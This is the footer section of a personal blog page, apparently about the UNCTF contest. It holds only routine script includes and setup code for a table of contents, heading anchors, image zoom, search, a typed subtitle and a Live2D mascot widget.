<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "UNCTF&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: true,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
      icon: "§"
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>












  

  

  

  

  

  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>
